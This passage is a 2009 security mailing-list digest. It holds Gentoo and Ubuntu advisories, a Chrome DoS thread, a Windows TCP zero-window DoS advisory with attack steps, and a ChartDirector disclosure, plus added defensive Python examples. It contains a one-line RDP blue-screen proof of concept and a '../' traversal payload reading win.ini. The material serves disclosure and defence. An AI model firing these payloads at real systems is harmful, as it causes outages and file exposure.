        ID: 200909-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An input validation error in aMule enables remote attackers to pass arbitrary parameters to a victim's media player.

Background
==========

aMule is an eMule-like client for the eD2k and Kademlia networks, supporting multiple platforms.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  net-p2p/amule                    < 2.2.5                   >= 2.2.5

Description
===========

Sam Hocevar discovered that the aMule preview function does not properly sanitize file names.

Impact
======

A remote attacker could entice a user to download a file with a specially crafted file name to inject arbitrary arguments to the victim's video player.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All aMule users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =net-p2p/amule-2.2.5

References
==========

  [ 1 ] CVE-2009-1440
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1440

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[ GLSA 200909-05 ] Openswan: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200909-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Openswan: Denial of Service
      Date: September 09, 2009
      Bugs: #264346, #275233
        ID: 200909-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in the pluto IKE daemon of Openswan might allow remote attackers to cause a Denial of Service.

Background
==========

Openswan is an implementation of IPsec for Linux.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  net-misc/openswan               < 2.4.15                  >= 2.4.15

Description
===========

Multiple vulnerabilities have been discovered in Openswan:

* Gerd v. Egidy reported a NULL pointer dereference in the Dead Peer Detection of the pluto IKE daemon as included in Openswan (CVE-2009-0790).

* The Orange Labs vulnerability research team discovered multiple vulnerabilities in the ASN.1 parser (CVE-2009-2185).

Impact
======

A remote attacker could exploit these vulnerabilities by sending specially crafted R_U_THERE or R_U_THERE_ACK packets, or a specially crafted X.509 certificate containing a malicious Relative Distinguished Name (RDN), UTCTIME string or GENERALIZEDTIME string to cause a Denial of Service of the pluto IKE daemon.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Openswan users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =net-misc/openswan-2.4.15

References
==========

  [ 1 ] CVE-2009-0790
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0790
  [ 2 ] CVE-2009-2185
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2185

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
4f: The File Format Fuzzing Framework
Krakow Labs Development
4f: The File Format Fuzzing Framework

4f is a file format fuzzing framework. 4f uses modules which are specifications of the targeted binary or text file format that tell it how to fuzz the target application. If 4f detects a crash, it will log crucial information important for allowing the 4f user to reproduce the problem and also debugging information important to deciding the severity of the bug and its exploitability. 4f uses specialized modules for fuzzing code that interprets file formats. Several modules are included and more can be written to follow other file formats.

Full source code, binary, package, demonstration photo and video @ http://www.krakowlabs.com

You can also check out the video that shows 4f discovering 0day (not worth much but it shows 4f works!) @ SecurityTube too --> http://www.securitytube.net/The-File-Format-Fuzzing-Framework-(4f)-video.aspx

~KL
[ GLSA 200909-04 ] Clam AntiVirus: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200909-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: Normal
Title: Clam AntiVirus: Multiple vulnerabilities
Date: September 09, 2009
Bugs: #264834, #265545
ID: 200909-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in ClamAV allow for the remote execution of arbitrary code or Denial of Service.

Background
==========

Clam AntiVirus (short: ClamAV) is an anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways.

Affected packages
=================

    Package                  /  Vulnerable  /  Unaffected
    1  app-antivirus/clamav     < 0.95.2        >= 0.95.2

Description
===========

Multiple vulnerabilities have been found in ClamAV:

* The vendor reported a divide-by-zero error in the PE ("Portable Executable"; Windows .exe) file handling of ClamAV (CVE-2008-6680).

* Jeffrey Thomas Peckham found a flaw in libclamav/untar.c, possibly resulting in an infinite loop when processing TAR archives in clamd and clamscan (CVE-2009-1270).

* Martin Olsen reported a vulnerability in the CLI_ISCONTAINED macro in libclamav/others.h, when processing UPack archives (CVE-2009-1371).

* Nigel disclosed a stack-based buffer overflow in the "cli_url_canon()" function in libclamav/phishcheck.c when processing URLs (CVE-2009-1372).

Impact
======

A remote attacker could entice a user or automated system to process a specially crafted UPack archive or a file containing a specially crafted URL, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. Furthermore, a remote attacker could cause a Denial of Service by supplying a specially crafted TAR archive or PE executable to a Clam AntiVirus instance.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Clam AntiVirus users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =app-antivirus/clamav-0.95.2

References
==========

  [ 1 ] CVE-2008-6680
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6680
  [ 2 ] CVE-2009-1270
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1270
  [ 3 ] CVE-2009-1371
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1371
  [ 4 ] CVE-2009-1372
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1372

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[ GLSA 200909-03 ] Apache Portable Runtime, APR Utility Library: Execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200909-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: Normal
Title: Apache Portable Runtime, APR Utility Library: Execution of arbitrary code
Date: September 09, 2009
Bugs: #280514
ID: 200909-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple integer overflows in the Apache Portable Runtime and its Utility Library might allow for the remote execution of arbitrary code.

Background
==========

The Apache Portable Runtime (aka APR) provides a set of APIs for creating platform-independent applications. The Apache Portable Runtime Utility Library (aka APR-Util) provides an interface to functionality such as XML parsing, string matching and database connections.

Affected packages
=================

    Package              /  Vulnerable  /  Unaffected
    1  dev-libs/apr         < 1.3.8         >= 1.3.8
    2  dev-libs/apr-util    < 1.3.9         >= 1.3.9

    2 affected packages on all of their supported architectures.

Description
===========

Matt Lewis reported multiple integer overflows in the apr_rmm_malloc(), apr_rmm_calloc(), and apr_rmm_realloc() functions in misc/apr_rmm.c of APR-Util and in memory/unix/apr_pools.c of APR, both occurring when aligning memory blocks.

Impact
======

A remote attacker could entice a user to connect to a malicious server with software that uses the APR, or act as a malicious client to a server that uses the APR (such as Subversion or Apache servers), possibly resulting in the execution of arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Apache Portable Runtime users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =dev-libs/apr-1.3.8

All APR Utility Library users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =dev-libs/apr-util-1.3.9

References
==========

  [ 1 ] CVE-2009-2412
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2412

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
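The advisory's bug class, an integer overflow while aligning a block size, is easy to see with fixed-width arithmetic. This is an added example rather than APR's own code: it emulates a 32-bit size_t in Python, uses the same arithmetic shape as APR's APR_ALIGN macro, and the HEADER constant, BOUNDARY and function names are constructed assumptions.

```python
"""Added example (not APR's code): a size alignment done with unchecked
arithmetic wraps on a 32-bit size_t, so the allocator reserves far less
than the caller asked for. The macro shape is that of APR's APR_ALIGN;
the 32-bit emulation, HEADER and function names are constructed."""

SIZE_T_MAX = (1 << 32) - 1        # emulate a 32-bit size_t
HEADER = 16                       # constructed: bookkeeping bytes per block
BOUNDARY = 8                      # alignment boundary, a power of two


def align_up_unchecked(size):
    """APR_ALIGN-style arithmetic, truncated to 32 bits like C would do."""
    return ((size + BOUNDARY - 1) & ~(BOUNDARY - 1)) & SIZE_T_MAX


def align_up_checked(size):
    """Same result, but None when (size + BOUNDARY - 1) would overflow."""
    if size > SIZE_T_MAX - (BOUNDARY - 1):
        return None
    return (size + BOUNDARY - 1) & ~(BOUNDARY - 1)


def reserve_size(request, checked):
    """Bytes the allocator would reserve for `request` user bytes + HEADER.

    Returns None when the checked variant refuses the request.
    """
    if checked:
        if request > SIZE_T_MAX - HEADER:
            return None                 # request + HEADER itself would wrap
        return align_up_checked(request + HEADER)
    # Unchecked path: the addition wraps silently, exactly as in C.
    return align_up_unchecked((request + HEADER) & SIZE_T_MAX)


def is_undersized(request, reserved):
    """True when the block is smaller than the bytes the caller will write."""
    return reserved is not None and reserved < request


if __name__ == "__main__":
    big = 0xFFFFFFF8
    print(reserve_size(big, checked=False))  # 8: a ~4 GiB request gets 8 bytes
    print(reserve_size(big, checked=True))   # None: refused before allocating
```

The unchecked path hands back a tiny block for a huge request, which is the heap corruption the advisory's Impact section refers to; the checked path turns the same request into an allocation failure.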
Re: DoS vulnerability in Google Chrome
Hello MaXe!

> However, I just tested the vulnerability in chrome and the incidents were different.

As I said, on my system it's solely a Chrome DoS vulnerability. On my system with Firefox 3.0.13 (and previous versions, when I tested them before) there is no such issue, when Firefox was DoSed via Chrome, i.e. Cross-Application DoS. Taking into account that you have this issue with Firefox 3.5.2, then it can be a problem with FF 3.5.x versions, which have tight integration with Chrome's and other software's URI handlers.

> However I believe this can be used / triggered against any other application installed that FireFox knows exists on the target operating system. :-)

It's quite possible, because I didn't check this Cross-Application DoS in Firefox (due to that my FF 3.0.13 is not affected by this attack). If there is such a hole, it can be possible to make a similar attack against any other installed application which has its URI handler registered in the system. And not only Firefox (and the system) must know about it, but the attacker also must know about it :-).

My idea was to make a blocking DoS attack on Chrome (first exploit was blocking DoS, second was blocking DoS and DoS via resources consumption). Which I wrote about last year in my Classification of DoS vulnerabilities in browsers (http://websecurity.com.ua/2550/). In 2008 I wrote about many blocking DoS vulnerabilities in browsers, and this year I continued to write about such holes, and after this one I'd write about another one soon (which I found last year). Like these DoS vulnerabilities in Firefox, IE, Chrome and Opera (http://websecurity.com.ua/3194/). Or like the DoS vulnerability in Internet Explorer 7 (http://websecurity.com.ua/2872/), which is similar to DoS vulnerabilities in Firefox, Opera and Chrome (http://websecurity.com.ua/2456/); all of them are printing DoS attacks.

> This will ONLY work if FireFox does NOT know which program to use.

It's interesting, because as I understand from your first information it works in Firefox (via Chrome), and from your previous text ("that FireFox knows exists on the target operating system") it must work if Firefox does KNOW which program to use. But in your case the DoS effect is better when Firefox does not know about the program than if it does know.

> (I'll post it on my own website anyway, giving you credit too of course.)

Thanks. I'm glad that my blocking DoS and DoS via resources consumption exploit gave you inspiration to find a new way to attack Firefox and IE7 ;-).

> Internet Explorer 7 version: 7.0.5730.13 will by the way consume up to 70% of the CPU if the same script is run.

MaXe, it's a resource consumption DoS, which is described in my above-mentioned Classification of DoS vulnerabilities in browsers. So if 70% or higher (up to 100%) of CPU resources is used, it's already a resource consumption DoS.

As I wrote before, my IE6 isn't affected by that hole in Chrome. Is your IE7 affected by my Chrome exploit, or only by your AIM exploit? Because if there is the mentioned hole, then it must be affected by both exploits.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message -----
From:
To: ;
Sent: Wednesday, August 26, 2009 11:41 AM
Subject: Re: DoS vulnerability in Google Chrome

Hello MustLive,

Thanks for your immediate reply. I have now tested what you said, cause I suspected that it was only happening because Google Chrome was installed, due to FireFox isn't able to know what ``chromehtml:´´ is on its own. (it has to be associated with an application in this case).

The following would open a lot of windows, consuming most likely all resources:
http://websecurity.com.ua/uploads/2009/Google%20Chrome%20DoS%20Exploit2.html

FireFox version: FireFox 3.5.2 (Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Google Chrome versions: 4.0.202.0 && 2.0.172.43 (both tested, the first is the new beta.)
Operating System: Windows XP Pro SP2
Hardware: 1.8ghz (single core) & 1GB ram.

However, I just tested the vulnerability in chrome and the incidents were different. In Google Chrome it appears to perform a deadlock of the browser while on FireFox it performs a starvation "attack" by opening a huge amount of windows and thereby eventually "killing" all the ram making Windows completely useless (almost). The only thing I could do was to logout and then log back in. Task Manager was unable to help me even though it was set to "Always On Top". If the Task Manager was opened first then I might have had a chance but if it weren't then 4 out of 5 times the best option would be to logout and then re-login.

I believe this is a kind of functionality bug versus denial of service bug in FireFox which unfortunately is not related to the Chrome Bug. This was tested at my work since I don't have Google chrome installed on my linux installation at home.

However I believe this can be used / triggered again
SeacureIT Preview Conference 2009
We are glad to announce the first international security conference in Italy, SeacureIT Preview 2009.

The conference will take place between 21st and 23rd October at Fiera Milano City, Milan's conference and trade show center, co-located with SMAU, Italy's largest ICT tradeshow.

The conference will consist of two days of top-notch trainings and one day of bleeding edge talks. Topics of presentations this year include but are not limited to OSX security, hardware hacking, SAP exploiting, web 2.0 threats and malware analysis. Aside from highly technical presentations we are pleased to have a roundtable and a number of talks focusing on the economic aspect of cybersecurity, brought to you by well known cybersecurity and cybercrime experts.

To read the full line-up of speakers please see: http://www.seacure.it/speakers.htm

The conference will be concluded by a networking event with a full typical Milanese "aperitivo".

For those interested in trainings, the topics range from SAP security to Oracle hacking, from exploitation techniques to physical security. To learn more on the trainings, please visit http://www.seacure.it/training.htm

SeacureIT preview (hosted in Milan, the world-renowned "city of fashion") is a launch event for our main conference which will take place in 2010 in beautiful Sardinia, in the middle of the Mediterranean sea. A full description of this year's location as well as next year's can be seen at: http://www.seacure.it/venue.htm

You will have the opportunity of listening to a set of excellent speakers, at a really convenient entrance fee; additionally, all the participants to the Preview edition will enjoy a 100 EUR rebate on the 2010 edition of the conference (and the trainings participants will get a full 200 EUR rebate on any training of their choice next year!).

We hope to see all of you in Milan!

Best regards,
The SeacureIT team
Multiple RDP Connections BSOD DOS
Creating multiple RDP connections at the same time causes Windows to Blue Screen. Here is the Proof of Concept code.

for /L %i in (1,1,20) do mstsc /v:127.0.0.%i

It does work on Windows 7 and some Vista installations.

-Tim Medin
TCP/IP Orphaned Connections Vulnerability
Hi,

concerning MS09-048 and in particular CVE-2009-1926, we would like to publish the following advisory:

http://www.recurity-labs.com/content/pub/Microsoft_Windows_CVE-2009-1926_MS09-048.txt

regards,
Fabian "fabs" Yamaguchi, Recurity Labs GmbH

Recurity Labs GmbH
http://www.recurity-labs.com
entomol...@recurity-labs.com

Date: 09.09.2009
Vendor: Microsoft Corporation
Product: Microsoft Windows XP/Vista TCP/IP-Stack
Vulnerability: TCP/IP Orphaned Connections Vulnerability
Affected Releases: Windows Vista Business SP1 / Windows XP SP3
Severity: Moderate
CVE: CVE-2009-1926

Vendor communication:

09.12.2008 Initial notification sent to MSRC
10.12.2008 Response from MSRC case manager - The report is being investigated.
23.12.2008 Recurity Labs would like to know whether MSRC considers this a vulnerability. If not so, Recurity Labs would like to mention the issue in an upcoming talk on TCP Denial Of Service vulnerabilities at the 25th Chaos Communication Congress (25C3).
28.12.2008 Recurity Labs agrees not to mention the issue until MSRC has had a chance to classify it.
09.01.2009 MSRC case manager asks for a copy of the presentation slides.
13.01.2009 Vulnerability is classified as a 'Moderate' DoS by MSRC.
26.02.2009 Update on the issue by MSRC - A fix is scheduled for May or June.
27.03.2009 Update on the issue by MSRC - The fix is still scheduled for June.
08.05.2009 Update on the issue by MSRC - The fix is delayed to August.
29.07.2009 Meeting the MSRC case manager at BlackHat USA and getting a t-shirt. Thanks, nice move.
05.08.2009 Update on the issue by MSRC - The fix is ready but issues arose during testing. The release is rescheduled.
09.09.2009 Microsoft releases MS09-048

Overview:

The TCP/IP-Stack of the Microsoft Windows XP/Vista Operating System is vulnerable to a remote resource exhaustion vulnerability. By taking advantage of this vulnerability, an attacker can cause a connection's Transmission Control Block (TCB) to remain in memory for an indefinite amount of time without the need for the attacker to further maintain the connection's activity.

Description:

The vulnerabilities exist in the implementation of TCP's flow-control mechanism, in particular due to incorrect handling of advertised "zero-windows". Zero-windows may be advertised by a TCP after a connection enters the "ESTABLISHED" state to indicate that it is currently not able to accept any data due to limited buffer-space. Given that pending data exists, which the peer TCP needs to deliver, the peer then starts its persist-timer, which periodically queries the value of the flow-control window by issuing so called zero-window-probes. These probes are TCP segments containing a single byte of payload, which force the receiver to generate an acknowledgment, which in turn allows the peer to receive an update on the current value of the flow-control window. As a side effect, the retransmission-timer is disabled because persist- and retransmission-timer are mutually exclusive. The sending TCP is said to be in persist-state.

In Windows XP and Windows Vista, connections which are in the state "FIN_WAIT_1" or "FIN_WAIT_2" respectively do not ever terminate if the flow-control mechanism is in "persist-state". This can be demonstrated as follows:

1. The Attacker establishes a TCP-connection with the target.

2. The Attacker sends a specially crafted TCP-segment to the target. The segment must fulfill the following criteria:

   a) The advertised flow-control window is set to zero.

   b) If the layer-5 application that is in possession of the socket associated with this connection does not automatically send data to the attacker, the segment needs to cause the application to do so.

   c) To increase the attack speed, the segment-data should cause the layer-5 application to terminate the connection as soon as possible. For example, if the layer-5 application is a web-server, a GET-Request which references a non-existing resource is a good choice. When targeting the NetBIOS Session Manager (port 139), simply sending an invalid request such as 'abc\n' is sufficient.

3. Since the layer-5 application closes the socket associated with the connection in response to the attacker's request, the connection moves into state "FIN_WAIT_1" a
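Since the symptom of this bug is a TCB that never leaves FIN_WAIT_1/FIN_WAIT_2, a defender can look for it in ordinary `netstat -an` output: a half-closed connection that is still present in a second capture taken some time later is being held open, and a peer holding many of them at once stands out. The script below is an added example, not part of the Recurity advisory; its snapshots, addresses and threshold are constructed.

```python
"""Added example (not from the Recurity advisory): flag remote hosts that
keep many of a machine's connections half-closed (FIN_WAIT_1/FIN_WAIT_2)
across two `netstat -an` captures. The snapshots below are constructed;
the threshold and function names are my own."""
from collections import Counter

HALF_CLOSED = {"FIN_WAIT_1", "FIN_WAIT_2"}


def parse_netstat(text):
    """Return {(local, remote): state} for the TCP rows of a netstat dump.

    Follows the Windows `netstat -an` layout (Proto, Local, Foreign, State);
    a trailing PID column from `netstat -ano` is simply ignored.
    """
    conns = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0].upper() != "TCP":
            continue  # header, blank, UDP or malformed row
        conns[(parts[1], parts[2])] = parts[3].upper()
    return conns


def peer_ip(endpoint):
    """'192.0.2.10:40001' -> '192.0.2.10'; '[2001:db8::1]:80' -> '2001:db8::1'."""
    return endpoint.rsplit(":", 1)[0].strip("[]")


def stale_half_closed(earlier, later):
    """Connections half-closed in both snapshots: the local side sent its
    FIN before the first capture and the TCB is still being held."""
    return {
        key for key, state in later.items()
        if state in HALF_CLOSED and earlier.get(key) in HALF_CLOSED
    }


def suspicious_peers(stale, threshold=10):
    """Remote IPs holding at least `threshold` stale half-closed connections."""
    counts = Counter(peer_ip(remote) for _, remote in stale)
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed snapshots: 192.0.2.10 holds twelve sessions to the NetBIOS
# session port in FIN_WAIT_1 in both captures; 198.51.100.7 only just
# started closing, so it is not stale.
_HOLDER_ROWS = [
    f"  TCP    10.0.0.5:139           192.0.2.10:{40000 + i}       FIN_WAIT_1"
    for i in range(12)
]
SNAP_T0 = "\n".join(
    ["Proto  Local Address          Foreign Address        State",
     "  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING",
     "  TCP    10.0.0.5:139           198.51.100.7:51000     ESTABLISHED"]
    + _HOLDER_ROWS)
SNAP_T1 = "\n".join(
    ["  TCP    10.0.0.5:139           198.51.100.7:51000     FIN_WAIT_2"]
    + _HOLDER_ROWS)


def report(t0_text=SNAP_T0, t1_text=SNAP_T1, threshold=10):
    """Parse both captures and return {remote_ip: stale_count} over threshold."""
    stale = stale_half_closed(parse_netstat(t0_text), parse_netstat(t1_text))
    return suspicious_peers(stale, threshold)


if __name__ == "__main__":
    print(report())  # {'192.0.2.10': 12}
```

Feed it two captures taken several minutes apart; on a patched stack half-closed connections drain on their own, so anything that survives both captures deserves a look, and a single peer accounting for most of them is the pattern this advisory describes.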
[Advisory] ChartDirector Critical File Access
Hi,

Please find the following Advisory
http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=37

Regards
DokFLeed

Advisory No.: ISNSC-0910
========================
ChartDirector Critical File Access

Information
===========
Author: DokFLeed
Program Affected: http://www.chartdir.com for .NET
Version: 5.0.1
Severity: Critical.
Type of Advisory: Mid Disclosure.
Affected/Tested Versions: Random

Program Description
===================
Widely used Chart Component on Financial & Stock Trading websites

Overview
========
The query variable "cacheId=" is not sanitized; it can allow critical files to be downloaded.

Proof Of Concept
================
?ChartDirectorChartImage=chart_WebChartViewer1&cacheId=/../../../../../../../../windows/win.ini

Solution/Fix
============
Upgrade to the latest ChartDirector or apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2):
http://www.advsofteng.com/netchartdir501p2.zip

Vendor Status
=============
The problem you mentioned affects ChartDirector for .NET. The current version of ChartDirector for .NET on our web site (Ver 5.0.2) already has this issue fixed. So this issue no longer occurs with the current version of ChartDirector for .NET. For people using earlier versions of ChartDirector, it is suggested they upgrade to the latest version. They may also apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2):
http://www.advsofteng.com/netchartdir501p2.zip

Reference
=========
http://dokfleed.net/duh/modules.php?name=News&file=article&sid=48
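The advisory's root cause is a cache identifier used directly as a file name. As an added example that is not ChartDirector's code, here is the unsafe shape beside a checked one: the identifier is allow-listed after URL decoding and the resolved path is then proven to stay inside the cache directory. CACHE_DIR, the pattern and the function names are constructed assumptions; posixpath is used so the path arithmetic is identical on every platform.

```python
"""Added example (not ChartDirector's code): the unsafe and the checked way
to map a request's cacheId value onto a file in the chart cache directory.
CACHE_DIR and the allow-list pattern are constructed assumptions."""
import posixpath
import re
from urllib.parse import unquote

CACHE_DIR = "/srv/app/chart-cache"  # constructed
# A cache id should be an opaque token: letters, digits, '-' and '_' only.
CACHE_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def cache_path_unchecked(cache_id):
    """Vulnerable shape: the query value is spliced straight into the path.

    A value starting with '/' discards CACHE_DIR entirely, and '..' segments
    climb out of it, so the result can be any file the server can read.
    """
    return posixpath.normpath(posixpath.join(CACHE_DIR, unquote(cache_id)))


def is_inside_cache(path):
    """True when `path` (already normalised) lies under CACHE_DIR."""
    return posixpath.commonpath([CACHE_DIR, path]) == CACHE_DIR


def cache_path_checked(cache_id):
    """Hardened shape: allow-list the id, then prove the result stays inside
    CACHE_DIR. Returns None for anything that should be rejected."""
    cache_id = unquote(cache_id)              # validate the decoded value
    if not CACHE_ID_RE.fullmatch(cache_id):   # fullmatch: no trailing newline trick
        return None
    path = posixpath.normpath(posixpath.join(CACHE_DIR, cache_id))
    # Defence in depth: even a mistake in the pattern must not let it escape.
    if not is_inside_cache(path):
        return None
    return path


if __name__ == "__main__":
    probe = "/../../../../../../../../windows/win.ini"   # the advisory's PoC value
    print(cache_path_unchecked(probe))   # /windows/win.ini  (outside CACHE_DIR)
    print(cache_path_checked(probe))     # None
    print(cache_path_checked("abc123"))  # /srv/app/chart-cache/abc123
```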
Open Beta - New Free AV Software
All,

Immunet Protect is now in the 4th round of public beta. This is free beta AV software which has been pre-tested extensively by a portion of the Bugtraq community and is now available for general download to the rest of the community.

The general idea is that it allows you to build communities of people and collectively share your protections. It uses a series of methods to convict files, primarily in the cloud. It is meant to be run in conjunction with your current AV to increase your detection rates and is compatible with Norton/AVG/McAfee/Avira 2009 and greater. It is not yet formally tested with other products but has been reported to work alongside Eset, Gdata, Panda Cloud and MSSE.

If you would like to try it in beta we welcome your participation and more importantly, your feedback. Since posting to Bugtraq initially we've gone from 60 pre-beta users to slightly over 10,000 as I write this. Many of them part of this fantastic community, thanks for the support!

The download URL is: http://www.immunet.com/user/new/

Best Regards,
Al Huger
Immunet Corp.
[USN-828-1] PAM vulnerability
===========================================================
Ubuntu Security Notice USN-828-1             September 08, 2009
pam vulnerability
https://launchpad.net/bugs/410171
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 8.10:
  libpam-runtime                  1.0.1-4ubuntu5.6

Ubuntu 9.04:
  libpam-runtime                  1.0.1-9ubuntu1.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Russell Senior discovered that the system authentication module selection mechanism for PAM did not safely handle an empty selection. If an administrator had specifically removed the default list of modules or failed to choose a module when operating debconf in a very unlikely non-default configuration, PAM would allow any authentication attempt, which could lead to remote attackers gaining access to a system with arbitrary privileges. This did not affect default Ubuntu installations.
Updated packages for Ubuntu 8.10: